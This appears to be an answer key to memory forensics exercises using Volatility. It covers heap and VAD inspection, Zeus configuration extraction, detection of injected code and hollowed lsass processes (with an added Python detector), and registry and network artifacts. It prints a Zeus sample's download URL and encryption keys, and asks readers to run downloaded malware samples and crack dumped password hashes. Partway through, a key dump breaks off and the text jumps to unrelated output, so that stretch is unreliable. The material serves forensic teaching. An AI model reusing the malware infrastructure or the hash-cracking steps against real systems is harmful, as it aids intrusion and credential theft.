   Offset(V)  Name                 PID    PPID   Thds   Hnds     Sess   Wow64  Start                          Exit
   ---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
   0x82226850 processmemory.e         928   1008      1        9      0      0 2014-07-12 17:58:07 UTC+0000

2. What data does it write to its heap? Use volshell to investigate.

   The correct answer is: "hello from the heap!"

   From the program's output, we know the heap address is 1531c0, so you can investigate like this:

   $ python vol.py -f XPSP3-8c391840.vmem volshell -p 928
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Current context: processmemory.e @ 0x82226850, pid=928, ppid=1008 DTB=0xa9401e0
   Python 2.7.6 (v2.7.6:3a1db0d2747e, Nov 10 2013, 00:42:54)
   Type "copyright", "credits" or "license" for more information.

   IPython 2.0.0 -- An enhanced Interactive Python.
   ?         -> Introduction and overview of IPython's features.
   %quickref -> Quick reference.
   help      -> Python's own help system.
   object?   -> Details about 'object', use 'object??' for extra details.

   In [1]: db(0x1531c0)
   0x001531c0  68 65 6c 6c 6f 20 66 72 6f 6d 20 74 68 65 20 68   hello.from.the.h
   0x001531d0  65 61 70 21 00 00 00 00 00 00 00 00 00 00 00 00   eap!............
   0x001531e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
   0x001531f0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
   0x00153200  c0 01 09 00 00 10 00 00 78 01 15 00 78 01 15 00   ........x...x...
   0x00153210  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
   0x00153220  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
   0x00153230  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

3. Use the yarascan plugin to scan for the data you identified in Question 2. Does it show up in the expected location?
It's found in two different locations:

$ python vol.py -f XPSP3-8c391840.vmem yarascan -p 928 -Y "hello from the heap"
Volatility Foundation Volatility Framework 2.4 (Beta)
Rule: r1
Owner: Process processmemory.e Pid 928
0x0040a9b0  68 65 6c 6c 6f 20 66 72 6f 6d 20 74 68 65 20 68   hello.from.the.h
0x0040a9c0  65 61 70 21 00 00 00 00 48 00 65 00 61 00 70 00   eap!....H.e.a.p.
0x0040a9d0  20 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00   ..a.l.l.o.c.a.t.
0x0040a9e0  69 00 6f 00 6e 00 3a 00 20 00 25 00 78 00 0a 00   i.o.n.:...%.x...
0x0040a9f0  00 00 00 00 00 00 00 00 46 00 61 00 69 00 6c 00   ........F.a.i.l.
0x0040aa00  65 00 64 00 20 00 74 00 6f 00 20 00 61 00 6c 00   e.d...t.o...a.l.
0x0040aa10  6c 00 6f 00 63 00 61 00 74 00 65 00 20 00 68 00   l.o.c.a.t.e...h.
0x0040aa20  65 00 61 00 70 00 20 00 6d 00 65 00 6d 00 6f 00   e.a.p...m.e.m.o.
0x0040aa30  72 00 79 00 2e 00 00 00 46 00 69 00 6c 00 65 00   r.y.....F.i.l.e.
0x0040aa40  20 00 6d 00 61 00 70 00 70 00 69 00 6e 00 67 00   ..m.a.p.p.i.n.g.
0x0040aa50  20 00 63 00 72 00 65 00 61 00 74 00 65 00 64 00   ..c.r.e.a.t.e.d.
0x0040aa60  20 00 61 00 74 00 3a 00 20 00 25 00 78 00 0a 00   ..a.t.:...%.x...
0x0040aa70  00 00 00 00 46 00 61 00 69 00 6c 00 65 00 64 00   ....F.a.i.l.e.d.
0x0040aa80  20 00 74 00 6f 00 20 00 6d 00 61 00 70 00 20 00   ..t.o...m.a.p...
0x0040aa90  76 00 69 00 65 00 77 00 20 00 6f 00 66 00 20 00   v.i.e.w...o.f...
0x0040aaa0  66 00 69 00 6c 00 65 00 2e 00 00 00 46 00 61 00   f.i.l.e.....F.a.
Rule: r1
Owner: Process processmemory.e Pid 928
0x001531c0  68 65 6c 6c 6f 20 66 72 6f 6d 20 74 68 65 20 68   hello.from.the.h
0x001531d0  65 61 70 21 00 00 00 00 00 00 00 00 00 00 00 00   eap!............
0x001531e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x001531f0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153200  c0 01 09 00 00 10 00 00 78 01 15 00 78 01 15 00   ........x...x...
0x00153210  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153220  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153230  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153240  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153250  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153280  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00153290  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x001532a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x001532b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

The first is at 0x0040a9b0 and is inside the process executable:

$ python vol.py -f XPSP3-8c391840.vmem dlllist -p 928
Volatility Foundation Volatility Framework 2.4 (Beta)
************************************************************************
processmemory.e pid:    928
Command line : "C:\Documents and Settings\Administrator\Desktop\processmemory.exe"
Service Pack 3

Base       Size       LoadCount  Path
---------- ---------- ---------- ----
0x00400000    0x11000     0xffff C:\Documents and Settings\Administrator\Desktop\processmemory.exe
0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll
0x7c800000    0xf6000     0xffff C:\WINDOWS\system32\kernel32.dll

The second at 0x001531c0 is the one on the heap.

4. The application's output tells you "File mapping created at..." Use vadinfo and determine the name of the file it maps into that address.

The correct answer is: processmemory.exe (itself)

In our example, the address was 0x360000.
So you can do this:

$ python vol.py -f XPSP3-8c391840.vmem vadinfo -n processmemory --addr 0x360000
Volatility Foundation Volatility Framework 2.4 (Beta)
************************************************************************
Pid:    928
VAD node @ 0x822dadb8 Start 0x00360000 End 0x0036cfff Tag Vad
Flags: Protection: 1
Protection: PAGE_READONLY
ControlArea @820aa248 Segment e1156fc8
NumberOfSectionReferences:          1 NumberOfPfnReferences:          13
NumberOfMappedViews:                1 NumberOfUserReferences:          2
Control Flags: Accessed: 1, File: 1, HadUserReference: 1, WasPurged: 1
FileObject @821488a8, Name: \Documents and Settings\Administrator\Desktop\processmemory.exe
First prototype PTE: e20bf800 Last contiguous PTE: e20bf860
Flags2: CopyOnWrite: 1, Inherit: 1

5. What VAD tag is used to map the file you identified on Step 4?

The correct answer is: Vad

6. How can you distinguish the mapping you identified in Question 4 from the mapping of the process' executable?

The correct answer is: The one identified in Question 4 is PAGE_READONLY (a plain file mapping: File: 1, but no Image flag). The process' executable, according to dlllist, is at 0x00400000. That mapping is PAGE_EXECUTE_WRITECOPY and carries the ImageMap: 1 and Image: 1 flags:

Pid:    928
VAD node @ 0x823fcd38 Start 0x00400000 End 0x00410fff Tag Vad
Flags: CommitCharge: 4, ImageMap: 1, Protection: 7
Protection: PAGE_EXECUTE_WRITECOPY
ControlArea @8208b908 Segment e2241428
NumberOfSectionReferences:          1 NumberOfPfnReferences:          14
NumberOfMappedViews:                1 NumberOfUserReferences:          2
Control Flags: File: 1, HadUserReference: 1, Image: 1
FileObject @822de140, Name: \Documents and Settings\Administrator\Desktop\processmemory.exe
First prototype PTE: e2241468 Last contiguous PTE: fffffffc
Flags2: Inherit: 1

7. Run the zeusscan2 plugin against sample006.bin.
A) How many unique variants of Zeus are running?
B) Dump the associated VAD segment from one of the infected processes. Upload it to VirusTotal. Do you get any hits?

The correct answer is: 4 unique variants (you can tell because there are 4 unique RC4 keys).
Here is an example of one variant:

$ python vol.py --plugins=contrib/plugins/malware -f sample006.bin zeusscan2
Volatility Foundation Volatility Framework 2.4 (Beta)
**************************************************
Process            : explorer.exe
Pid                : 1752
Address            : 50855936
URL 0              : http://193.43.134.14/eu2.bin
Identifier         : JASONRESACC69_7875768F16073AAF
Mutant key         : 393228402
XOR key            : 537311486
Registry           : HKEY_CURRENT_USER\SOFTWARE\Microsoft\Izozo
Value 1            : Kealtuuxd
Value 2            : Yrdii
Value 3            : Kebooqu
Executable         : Obyt\ihah.exe
Data file          : Ebupzu\uzugl.zuw
Config RC4 key     :
0x03080000  4a ba 2c 63 eb 7c fc 45 c4 f3 b6 2d 31 29 21 2e   J.,c.|.E...-1)!.
0x03080010  53 0f 3f ef 9a 2a f8 82 96 6b e1 a2 3b 5f 34 fd   S.?..*...k..;_4.
0x03080020  a6 02 cc 39 0b 16 40 33 1f a1 dc af 93 9b 5b 94   ...9..@3......[.
0x03080030  68 62 84 46 ca 64 8d 43 13 d4 d9 72 00 5c 2b bc   hb.F.d.C...r.\+.
0x03080040  f6 d7 88 91 24 9f bd 1e 7a 07 c5 6e 1a 4e 90 92   ....$...z..n.N..
0x03080050  c1 42 0c 75 47 3a 9e 1d c2 ec 0d ed b8 71 b4 ab   .B.uG:.......q..
0x03080060  e6 5d e3 14 48 b9 e9 e8 b2 10 ee f4 e2 2f a4 09   .]..H......../..
0x03080070  54 b7 95 be 50 99 8b 87 8f 37 9d fa f2 d5 b1 18   T...P....7......
0x03080080  01 db 3c cf aa 70 e5 15 9c 5a 26 27 de da d8 d6   ..<..p...Z&'....
0x03080090  59 a8 1b 30 cd 6c 78 c0 e7 c6 81 22 86 17 38 a7   Y..0.lx...."..8.
0x030800a0  df 41 ad 4d 44 11 76 a3 52 a9 b3 6d 51 05 c9 b5   .A.MD.v.R..mQ...
0x030800b0  85 49 77 c7 23 f7 3e 8a 03 69 ac 3d 4c 89 ff 58   .Iw.#.>..i.=L..X
0x030800c0  dd 57 5e 97 98 f1 65 c3 7d f0 e0 20 e4 25 7e 7b   .W^...e.}....%~{
0x030800d0  b0 06 4b a5 c8 80 f9 f5 55 1c 7f 83 73 d1 66 fe   ..K.....U...s.f.
0x030800e0  8c 28 19 4f 60 36 0a 8e ce ae fb 0e 74 35 79 56   .(.O`6......t5yV
0x030800f0  a0 08 ea bb 67 d3 d0 6a 12 6f 32 bf d2 04 cb 61   ....g..j.o2....a
0x03080100  00 00                                             ..
Credential RC4 key :
0x03080000  6f e4 94 f2 f1 5e 5c c1 8c e8 66 c5 13 2a 23 39   o....^\...f..*#9
0x03080010  84 36 6a 83 b2 55 6c 11 5a f3 b6 20 07 6d ba de   .6j..Ul.Z....m..
0x03080020  52 8e 34 bf 8a 05 0f 64 35 29 cb 5f ff 00 87 fc   R.4....d5)._....
0x03080030  b5 5b 67 b8 eb 1a 0e 1f 32 ae 54 3a 88 ed c3 51   .[g.....2.T:...Q
0x03080040  40 14 3e 53 dc 7c a7 0b 79 26 e5 45 99 7d 1c d0   @.>S.|..y&.E.}..
0x03080050  90 8f 80 95 71 58 41 5d f9 af 9e a1 6e ef 25 4e   ....qXA]....n.%N
0x03080060  48 2d b1 bd 33 ab d3 b7 4d 10 7e 44 65 7b cd 2f   H-..3...M.~De{./
0x03080070  ea 3f 2c ce 9a 9d db 31 b0 69 cf f7 e7 a6 82 a4   .?,....1.i......
0x03080080  ad a3 30 9b 76 f0 f5 ac c2 fb 8b 4f fe 8d a8 04   ..0.v......O....
0x03080090  86 a0 50 4c 4b e2 ec 60 e6 dd c6 42 cc 6b 89 57   ..PLK..`...B.k.W
0x030800a0  d1 d8 78 4a 1d d7 9f e0 7a 75 e3 7f a2 77 85 2b   ..xJ....zu...w.+
0x030800b0  59 16 d6 d4 f4 93 ee 9c d2 03 be 2e 06 1b 56 70   Y.............Vp
0x030800c0  d5 73 ca f8 fd 12 37 49 98 46 0d bb 96 c9 18 b9   .s....7I.F......
0x030800d0  81 74 a9 3c 21 c4 da 38 0c 1e 27 0a c7 15 47 68   .t.<!..8..'..Gh

?         -> Introduction and overview of IPython's features.
%quickref -> Quick reference.
help      -> Python's own help system.
object?   -> Details about 'object', use 'object??' for extra details.

In [1]: for process in getprocs():
   ...:     if str(process.ImageFileName) == "cmd.exe":
   ...:         if process.Peb.ProcessParameters:
   ...:             print process.UniqueProcessId, process.Peb.ProcessParameters.StandardInput, process.Peb.ProcessParameters.StandardOutput, process.Peb.ProcessParameters.StandardError
   ...:
2484 3 7 11
292 3 7 11
832 128 128 128    <==== this one has non-standard handles

Now you know process ID 832 is the instance of cmd.exe that's redirecting the remote commands.

3. Analyze sample007.bin.
A) Are any processes hosting injected code? If so, which one(s)?
B) Have any processes been hollowed? If so, which one(s)?
C) Extract the injected code segments or hollowed process executables to disk for further static analysis.

The correct answer is: services.exe (pid 668), svchost.exe (pid 940), lsass.exe (pid 868), lsass.exe (pid 1928) are hosting injected code.
Here is some example output (the format below is what the malfind plugin prints):

$ python vol.py -f sample007.bin malfind
Volatility Foundation Volatility Framework 2.4 (Beta)
Process: services.exe Pid: 668 Address: 0x940000
Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE
Flags: Protection: 6

0x00940000  90 06 94 00 c6 07 94 00 24 00 94 00 a5 04 00 00   ........$.......
0x00940010  f2 04 94 00 48 06 00 00 c9 04 94 00 29 00 00 00   ....H.......)...
0x00940020  00 00 c5 00 e8 13 00 00 00 5a 77 4d 61 70 56 69   .........ZwMapVi
0x00940030  65 77 4f 66 53 65 63 74 69 6f 6e 00 5a 51 81 c1   ewOfSection.ZQ..

0x940000 90               NOP
0x940001 06               PUSH ES
0x940002 94               XCHG ESP, EAX
0x940003 00c6             ADD DH, AL
0x940005 07               POP ES

Process: services.exe Pid: 668 Address: 0x13f0000
Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE
Flags: Protection: 6

0x013f0000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
0x013f0010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
0x013f0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x013f0030  00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00   ................

0x13f0000 4d               DEC EBP
0x13f0001 5a               POP EDX
0x13f0002 90               NOP
0x13f0003 0003             ADD [EBX], AL
0x13f0005 0000             ADD [EAX], AL
0x13f0007 000400           ADD [EAX+EAX], AL

Process: svchost.exe Pid: 940 Address: 0xb70000
Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE
Flags: Protection: 6

0x00b70000  29 87 7f ae 00 00 00 00 ff ff ff ff 77 35 00 01   )...........w5..
0x00b70010  4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00   K.E.R.N.E.L.3.2.
0x00b70020  2e 00 44 00 4c 00 4c 00 2e 00 41 00 53 00 4c 00   ..D.L.L...A.S.L.
0x00b70030  52 00 2e 00 30 00 33 00 36 00 30 00 63 00 38 00   R...0.3.6.0.c.8.
0xb70000 29877fae0000     SUB [EDI+0xae7f], EAX
0xb70006 0000             ADD [EAX], AL
0xb70008 ff               DB 0xff
0xb70009 ff               DB 0xff
0xb7000a ff               DB 0xff
0xb7000b ff7735           PUSH DWORD [EDI+0x35]
0xb7000e 0001             ADD [ECX], AL

Process: lsass.exe Pid: 1928 Address: 0x680000
Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE
Flags: Protection: 6

0x00680000  90 06 68 00 c6 07 68 00 24 00 68 00 a5 04 00 00   ..h...h.$.h.....
0x00680010  f2 04 68 00 48 06 00 00 c9 04 68 00 29 00 00 00   ..h.H.....h.)...
0x00680020  00 00 6f 00 e8 13 00 00 00 5a 77 4d 61 70 56 69   ..o......ZwMapVi
0x00680030  65 77 4f 66 53 65 63 74 69 6f 6e 00 5a 51 81 c1   ewOfSection.ZQ..

0x680000 90               NOP
0x680001 06               PUSH ES
0x680002 6800c60768       PUSH DWORD 0x6807c600
0x680007 002400           ADD [EAX+EAX], AH
0x68000a 6800a50400       PUSH DWORD 0x4a500

Process: lsass.exe Pid: 1928 Address: 0x870000
Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE
Flags: Protection: 6

0x00870000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
0x00870010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
0x00870020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00870030  00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00   ................

0x870000 4d               DEC EBP
0x870001 5a               POP EDX
0x870002 90               NOP
0x870003 0003             ADD [EBX], AL
0x870005 0000             ADD [EAX], AL
0x870007 000400           ADD [EAX+EAX], AL

Also, the two extra lsass.exe processes (pids 868 and 1928) are hollowed. The legitimate copy (pid 680) shows that the image base of lsass.exe should be 0x01000000, backed by \WINDOWS\system32\lsass.exe. For pids 868 and 1928, the 0x01000000 range in ldrmodules is True/False/True (the same list membership as the legitimate copy) but has no mapped filename, which is the tell.
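The same check can be applied mechanically to a whole ldrmodules listing. This is an added Python 3 example, not Volatility code: it parses rows in the plugin's column layout (a constructed excerpt whose pid 680, 868 and 1928 rows mirror the sample007.bin output for lsass.exe), learns each process's expected image base from a row whose MappedPath ends in the process name, and reports pids whose row at that base has no backing file, plus any other loader-list entry without a MappedPath.

```python
import re

# Constructed excerpt in the ldrmodules column layout. The rows mirror the
# sample007.bin output for lsass.exe (pids 680, 868 and 1928); spacing is
# approximate and the row set is abridged.
LDRMODULES_SAMPLE = r"""
Pid      Process              Base       InLoad InInit InMem MappedPath
-------- -------------------- ---------- ------ ------ ----- ----------
680      lsass.exe            0x01000000 True   False  True  \WINDOWS\system32\lsass.exe
868      lsass.exe            0x00080000 False  False  False
868      lsass.exe            0x7c900000 True   True   True  \WINDOWS\system32\ntdll.dll
868      lsass.exe            0x01000000 True   False  True
1928     lsass.exe            0x7c900000 True   True   True  \WINDOWS\system32\ntdll.dll
1928     lsass.exe            0x01000000 True   False  True
1928     lsass.exe            0x00870000 True   True   True
"""

ROW_RE = re.compile(
    r"^(\d+)\s+(\S+)\s+(0x[0-9a-fA-F]+)\s+"
    r"(True|False)\s+(True|False)\s+(True|False)\s*(\S.*)?$"
)


def parse_ldrmodules(text):
    """Turn ldrmodules text rows into dicts; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        pid, process, base, inload, ininit, inmem, path = m.groups()
        rows.append({
            "pid": int(pid),
            "process": process,
            "base": int(base, 16),
            "inload": inload == "True",
            "ininit": ininit == "True",
            "inmem": inmem == "True",
            "path": (path or "").strip(),
        })
    return rows


def reference_image_bases(rows):
    """Expected image base per process name, learned from any row whose
    MappedPath ends in that process name (the known-good pid 680 above)."""
    ref = {}
    for r in rows:
        if r["path"].lower().endswith("\\" + r["process"].lower()):
            ref[r["process"].lower()] = r["base"]
    return ref


def find_hollowed(rows):
    """Pids whose row at the expected image base sits in the loader lists
    but has no MappedPath: the original image was unmapped and replaced."""
    ref = reference_image_bases(rows)
    hollowed = set()
    for r in rows:
        base = ref.get(r["process"].lower())
        in_lists = r["inload"] or r["ininit"] or r["inmem"]
        if base is not None and r["base"] == base and in_lists and not r["path"]:
            hollowed.add(r["pid"])
    return sorted(hollowed)


def find_unbacked_modules(rows):
    """Every entry present in at least one loader list with no file-backed
    mapping. Besides the hollowed image base this catches, for pid 1928,
    the injected PE at 0x00870000 that was linked into the lists. Rows with
    all three flags False are section mappings the loader never tracked,
    so there is no list membership to contradict and they are left alone."""
    return [(r["pid"], r["base"]) for r in rows
            if (r["inload"] or r["ininit"] or r["inmem"]) and not r["path"]]


if __name__ == "__main__":
    rows = parse_ldrmodules(LDRMODULES_SAMPLE)
    print("hollowed pids:", find_hollowed(rows))
    for pid, base in find_unbacked_modules(rows):
        print("pid %d: loader-list entry at 0x%08x has no backing file" % (pid, base))
```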
$ python vol.py -f sample007.bin ldrmodules -p 680,868,1928
Volatility Foundation Volatility Framework 2.4 (Beta)
Pid      Process              Base       InLoad InInit InMem MappedPath
-------- -------------------- ---------- ------ ------ ----- ----------
     680 lsass.exe            0x01000000 True   False  True  \WINDOWS\system32\lsass.exe
     868 lsass.exe            0x00080000 False  False  False
     868 lsass.exe            0x7c900000 True   True   True  \WINDOWS\system32\ntdll.dll
     868 lsass.exe            0x77e70000 True   True   True  \WINDOWS\system32\rpcrt4.dll
     868 lsass.exe            0x7c800000 True   True   True  \WINDOWS\system32\kernel32.dll
     868 lsass.exe            0x77fe0000 True   True   True  \WINDOWS\system32\secur32.dll
     868 lsass.exe            0x7e410000 True   True   True  \WINDOWS\system32\user32.dll
     868 lsass.exe            0x01000000 True   False  True
     868 lsass.exe            0x77f10000 True   True   True  \WINDOWS\system32\gdi32.dll
     868 lsass.exe            0x77dd0000 True   True   True  \WINDOWS\system32\advapi32.dll
    1928 lsass.exe            0x00080000 False  False  False
    1928 lsass.exe            0x7c900000 True   True   True  \WINDOWS\system32\ntdll.dll
    1928 lsass.exe            0x773d0000 True   True   True  \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
    1928 lsass.exe            0x77f60000 True   True   True  \WINDOWS\system32\shlwapi.dll
    1928 lsass.exe            0x771b0000 True   True   True  \WINDOWS\system32\wininet.dll
    1928 lsass.exe            0x77a80000 True   True   True  \WINDOWS\system32\crypt32.dll
    1928 lsass.exe            0x77fe0000 True   True   True  \WINDOWS\system32\secur32.dll
    1928 lsass.exe            0x77c00000 True   True   True  \WINDOWS\system32\version.dll
    1928 lsass.exe            0x01000000 True   False  True
    1928 lsass.exe            0x5b860000 True   True   True  \WINDOWS\system32\netapi32.dll
    1928 lsass.exe            0x77e70000 True   True   True  \WINDOWS\system32\rpcrt4.dll
    1928 lsass.exe            0x71ab0000 True   True   True  \WINDOWS\system32\ws2_32.dll
    1928 lsass.exe            0x71ad0000 True   True   True  \WINDOWS\system32\wsock32.dll
    1928 lsass.exe            0x774e0000 True   True   True  \WINDOWS\system32\ole32.dll
    1928 lsass.exe            0x7e410000 True   True   True  \WINDOWS\system32\user32.dll
    1928 lsass.exe            0x77f10000 True   True   True  \WINDOWS\system32\gdi32.dll
    1928 lsass.exe            0x77120000 True   True   True  \WINDOWS\system32\oleaut32.dll
    1928 lsass.exe            0x76d60000 True   True   True  \WINDOWS\system32\iphlpapi.dll
    1928 lsass.exe            0x769c0000 True   True   True  \WINDOWS\system32\userenv.dll
    1928 lsass.exe            0x7c800000 True   True   True  \WINDOWS\system32\kernel32.dll
    1928 lsass.exe            0x76bf0000 True   True   True  \WINDOWS\system32\psapi.dll
    1928 lsass.exe            0x77c10000 True   True   True  \WINDOWS\system32\msvcrt.dll
    1928 lsass.exe            0x77dd0000 True   True   True  \WINDOWS\system32\advapi32.dll
    1928 lsass.exe            0x7c9c0000 True   True   True  \WINDOWS\system32\shell32.dll
    1928 lsass.exe            0x00870000 True   True   True
    1928 lsass.exe            0x76f20000 True   True   True  \WINDOWS\system32\dnsapi.dll
    1928 lsass.exe            0x5d090000 True   True   True  \WINDOWS\system32\comctl32.dll
    1928 lsass.exe            0x71aa0000 True   True   True  \WINDOWS\system32\ws2help.dll
    1928 lsass.exe            0x77b20000 True   True   True  \WINDOWS\system32\msasn1.dll

You can dump the memory range like this:

$ python vol.py -f sample007.bin procdump --memory -D . -p 868,1928
Volatility Foundation Volatility Framework 2.4 (Beta)
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x81c498c8 0x01000000 lsass.exe            OK: executable.868.exe
0x81c47c00 0x01000000 lsass.exe            OK: executable.1928.exe

4. Extract storytime.dll.zip (password: infected).
A) Can you analyze the file in IDA Pro, PE analyzers, etc?
B) Run the DLL on a 64-bit system and dump memory while it's running.
C) Determine the load address of the DLL and unpack it from memory.

The correct answer is: No, you cannot initially analyze it statically in IDA Pro. Run it in the VM with "rundll32 ,ExportName" and then use dlldump to extract the unpacked copy.

5. Perform the following steps:
A) Create an account on virusshare.com
B) Download some malware samples (packed or unpacked)
C) Run them in your virtual machine and develop Yara signatures for detecting their presence
D) Create memory dumps and scan for your signatures with the yarascan plugin

The correct answer is: N/A

----------------------------------------------------------------------
Chapter 9: Event Logs
----------------------------------------------------------------------

1. What process on XP and 2003 stores mapped copies of the event log files?
A) evtsvc.exe
B) System
C) services.exe
D) mmc.exe

The correct answer is: C

2. Which of the following statement(s) are False?
A) Event logs can be cleared
B) Reconstructing event logs from memory may yield incomplete results, because not all records are mapped into memory (or they're paged)
C) If the Security event log is empty, you should check the logging policy in the registry
D) Volatility natively parses Vista and later event log formats

The correct answer is: D

3. Use the evtlogs plugin against an XP or 2003 memory image.
A) Analyze the output text files for particular event IDs
B) Export the raw logs and process them with a tool external to Volatility

The correct answer is: N/A

4. Analyze a Vista or later memory image.
A) Extract the event logs with the "dumpfiles" plugin
B) Analyze the event logs with a tool external to Volatility

The correct answer is: N/A

----------------------------------------------------------------------
Chapter 10: Registry in Memory
----------------------------------------------------------------------

1. Run the hivelist plugin on sample004.bin.
A) What's the virtual address of the HKEY_LOCAL_MACHINE\SOFTWARE hive?
B) What's the virtual address of the "administrator" user's HKEY_CURRENT_USER hive?
The correct answer is: A) 0xe14596b8 and B) 0xe10b9008

$ python vol.py -f sample004.bin hivelist
Volatility Foundation Volatility Framework 2.4 (Beta)
Virtual    Physical   Name
---------- ---------- ----
0xe1b67350 0x13f3c350 \Device\HarddiskVolume1\Documents and Settings\administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe10b9008 0x0cf25008 \Device\HarddiskVolume1\Documents and Settings\administrator\NTUSER.DAT
0xe175b9e8 0x082589e8 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1740b60 0x08241b60 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
0xe1682b60 0x07a02b60 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe16d9008 0x07e72008 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
0xe14596b8 0x069876b8 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1460008 0x06931008 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe1460b60 0x06931b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe1459b60 0x06987b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe1343b60 0x02a49b60 [no name]
0xe1035b60 0x02739b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x02733008 [no name]

2. Use the printkey plugin to check the "Microsoft\Windows\CurrentVersion\Run" key in both identified hives above. Do you see any entries that are worth further investigation?
The correct answer is: the svchosts.exe entry in HKLM (the real filename is svchost.exe)

$ python vol.py -f sample004.bin printkey -o 0xe14596b8 -K "Microsoft\Windows\CurrentVersion\Run"
Volatility Foundation Volatility Framework 2.4 (Beta)
Legend: (S) = Stable   (V) = Volatile

----------------------------
Registry: User Specified
Key name: Run (S)
Last updated: 2012-04-28 01:59:22 UTC+0000

Subkeys:
  (S) OptionalComponents

Values:
REG_SZ        Adobe Reader Speed Launcher : (S) "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
REG_SZ        Adobe ARM       : (S) "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
REG_SZ        svchosts        : (S) C:\WINDOWS\system32\svchosts.exe

3. Analyze sample007.bin. Determine which services were most recently added or modified.

The correct answer is: (see the example in Chapter 12 - page 354)

4. Extract the cached password hashes (using hashdump) on some of your memory samples. Load them into a password cracker to determine the plain text password (if possible).

The correct answer is: N/A

5. Execute the following steps:
A) On your system, launch some programs, browse to some directories in Explorer, etc
B) Create a memory dump of your system
C) Run the shimcache, userassist, and shellbags plugins. Do you see any artifacts of the actions you performed in A?
D) Run the plugins on some memory images from prior investigations

The correct answer is: N/A

----------------------------------------------------------------------
Chapter 11: Networking
----------------------------------------------------------------------

1. What is one potential way to hide winsock network activity from memory forensics tools?
A) Hook the DeviceIoControl API in user mode
B) Hook the IRP_MJ_DEVICE_CONTROL of tcpip.sys in kernel mode
C) Unlink the singly linked list of connection or socket structures in kernel mode
D) Use an NDIS driver

The correct answer is: D

2. TCP client and server applications both create _ADDRESS_OBJECT (sockets). True or False?
The correct answer is: True

3. Was RDP enabled on sample004.bin?

The correct answer is: Yes, you can see the open port with sockets:

$ python vol.py -f sample004.bin sockets | grep 3389
Volatility Foundation Volatility Framework 2.4 (Beta)
0x821fde98        852     3389      6 TCP      0.0.0.0         2012-04-28 01:57:04 UTC+0000

4. How many active connections did sample004.bin have? What websites (port 80 or 443) did it access in the recent past?

The correct answer is: 2 active connections (TCP 139 and 443).

$ python vol.py -f sample004.bin connections
Volatility Foundation Volatility Framework 2.4 (Beta)
Offset(V)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x8201ce68 172.16.150.20:1365        172.16.150.10:139         4
0x82018e00 172.16.150.20:1424        221.54.197.32:443         1096

It communicated with several web servers recently:

$ python vol.py -f sample004.bin connscan | egrep '(:80|:443)'
Volatility Foundation Volatility Framework 2.4 (Beta)
0x02018e00 172.16.150.20:1424        221.54.197.32:443         1096
0x02168718 172.16.150.20:1428        199.7.59.190:80           1796
0x0222aa40 172.16.150.20:1427        199.7.52.190:80           1796
0x0c3bfa40 172.16.150.20:1427        199.7.52.190:80           1796
0x1cd75a40 172.16.150.20:1427        199.7.52.190:80           1796
0x1df7aa40 172.16.150.20:1427        199.7.52.190:80           1796
0x1f3a1a40 172.16.150.20:1427        199.7.52.190:80           1796

